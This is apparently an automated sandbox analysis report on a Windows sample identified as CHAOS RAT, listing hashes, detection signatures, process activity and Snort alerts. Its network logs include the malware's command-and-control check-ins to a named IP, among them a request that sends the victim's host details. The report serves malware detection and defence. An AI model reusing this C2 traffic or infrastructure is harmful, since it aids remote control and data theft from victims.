Edit tour

Windows Analysis Report
pointcross.dat.exe

Overview

General Information

Sample Name:	pointcross.dat.exe
Analysis ID:	1348350
MD5:	585381bc89179fe4fd758c05ae7049b4
SHA1:	b8df37aeb48b75fa26f6ff8cc9cc213142f98d0d
SHA256:	b66cd936cb687374b4822dc779e08dc1e2ab0b595a59fad709aab94d9f61c12d
Tags:	exe
Infos:

Detection

CHAOS RAT

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected CHAOS RAT

Snort IDS alert for network traffic

Suspicious powershell command line found

Uses schtasks.exe or at.exe to add and modify task schedules

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Detected TCP or UDP traffic on non-standard ports

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Stores large binary data to the registry

Sample execution stops while process was sleeping (likely an evasion)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Classification

Process Tree

System is w10x64

pointcross.dat.exe (PID: 6684 cmdline: C:\Users\user\Desktop\pointcross.dat.exe MD5: 585381BC89179FE4FD758C05AE7049B4)

conhost.exe (PID: 6680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6880 cmdline: powershell -Command "schtasks /query /tn Orchestrator Cache Storage /v /fo LIST" MD5: 04029E121A0CFA5991749937DD22A1D9)

schtasks.exe (PID: 6160 cmdline: "C:\Windows\system32\schtasks.exe" /query /tn Orchestrator Cache Storage /v /fo LIST MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2873194373.00000000008F1000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_CHAOSRAT	Yara detected CHAOS RAT	Joe Security
Process Memory Space: pointcross.dat.exe PID: 6684	JoeSecurity_CHAOSRAT	Yara detected CHAOS RAT	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.pointcross.dat.exe.8f0000.0.unpack	JoeSecurity_CHAOSRAT	Yara detected CHAOS RAT	Joe Security

Snort Signatures

ET TROJAN Win32/Khaosz.A!MTB Checkin - Source IP: 192.168.2.4 - Destination IP: 213.183.63.99

Timestamp:	192.168.2.4213.183.63.994973280802037145 11/27/23-10:13:59.242019
SID:	2037145
Source Port:	49732
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN CHAOS RAT CnC Server Status Check - Source IP: 192.168.2.4 - Destination IP: 213.183.63.99

Timestamp:	192.168.2.4213.183.63.994973280802046873 11/27/23-10:13:58.191363
SID:	2046873
Source Port:	49732
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN CHAOS RAT Client Checkin - Source IP: 192.168.2.4 - Destination IP: 213.183.63.99

Timestamp:	192.168.2.4213.183.63.994973180802046872 11/27/23-10:11:57.761039
SID:	2046872
Source Port:	49731
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /device HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Length: 231Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzipData Raw: 7b 22 68 6f 73 74 6e 61 6d 65 22 3a 22 37 30 31 31 38 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 22 2c 22 75 73 65 72 5f 69 64 22 3a 22 4a 4f 4e 45 53 2d 50 43 5c 5c 6a 6f 6e 65 73 22 2c 22 6f 73 5f 6e 61 6d 65 22 3a 22 77 69 6e 64 6f 77 73 22 2c 22 6f 73 5f 61 72 63 68 22 3a 22 61 6d 64 36 34 22 2c 22 6d 61 63 5f 61 64 64 72 65 73 73 22 3a 22 65 63 3a 66 34 3a 62 62 3a 65 61 3a 31 35 3a 38 38 22 2c 22 6c 6f 63 61 6c 5f 69 70 5f 61 64 64 72 65 73 73 22 3a 22 38 39 2e 31 34 39 2e 31 38 2e 36 30 22 2c 22 70 6f 72 74 22 3a 22 38 30 38 30 22 2c 22 6c 6f 63 61 6c 65 5f 6c 61 6e 67 22 3a 22 65 6e 2d 43 48 22 2c 22 66 65 74 63 68 65 64 5f 75 6e 69 78 22 3a 31 37 30 31 30 37 36 33 31 37 7d Data Ascii: {"hostname":"701188","username":"","user_id":"user-PC\\user","os_name":"windows","os_arch":"amd64","mac_address":"ec:f4:bb:ea:15:88","local_ip_address":"89.149.18.60","port":"8080","locale_lang":"en-CH","fetched_unix":1701076317}

Source: unknown

DNS traffic detected: queries for: cloudflare.com

Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/trace HTTP/1.1Host: cloudflare.comUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /client HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Connection: UpgradeCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Sec-WebSocket-Key: k8psyLMnFZs8POXNEVOcXQ==Sec-WebSocket-Version: 13Upgrade: websocketX-Client: ec:f4:bb:ea:15:88
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET /health HTTP/1.1Host: 213.183.63.99:8080User-Agent: Go-http-client/1.1Content-Type: application/jsonCookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRob3JpemVkIjp0cnVlLCJleHAiOjE3MzIzNTQ1MDgsInVzZXIiOiJkZWZhdWx0In0.WTX2XYqY5VPNYlwrI2WAFhewEGtntd4AfEFr5wtN0Q8Accept-Encoding: gzip

Source: pointcross.dat.exe

Virustotal: Detection: 15%

Source: C:\Users\user\Desktop\pointcross.dat.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\pointcross.dat.exe

File opened: C:\Windows\system32\8e267d2ab49f82698707b0b50bb4df2b04fc62eeedf5bfc47a5be8eeca6d39baAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\pointcross.dat.exe C:\Users\user\Desktop\pointcross.dat.exe
Source: C:\Users\user\Desktop\pointcross.dat.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pointcross.dat.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "schtasks /query /tn Orchestrator Cache Storage /v /fo LIST"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /query /tn Orchestrator Cache Storage /v /fo LIST
Source: C:\Users\user\Desktop\pointcross.dat.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "schtasks /query /tn Orchestrator Cache Storage /v /fo LIST"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /query /tn Orchestrator Cache Storage /v /fo LIST	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2baze5bb.p2q.ps1

Jump to behavior

Source: classification engine

Classification label: mal72.troj.winEXE@6/4@1/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: pointcross.dat.exe

Static file information: File size 5921280 > 1048576

Source: pointcross.dat.exe

Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x5a5600

Source: pointcross.dat.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\Desktop\pointcross.dat.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "schtasks /query /tn Orchestrator Cache Storage /v /fo LIST"
Source: C:\Users\user\Desktop\pointcross.dat.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "schtasks /query /tn Orchestrator Cache Storage /v /fo LIST"			Jump to behavior

Source: pointcross.dat.exe

Static PE information: section name: UPX2

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /query /tn Orchestrator Cache Storage /v /fo LIST

Source: C:\Users\user\Desktop\pointcross.dat.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Users\user\Desktop\pointcross.dat.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
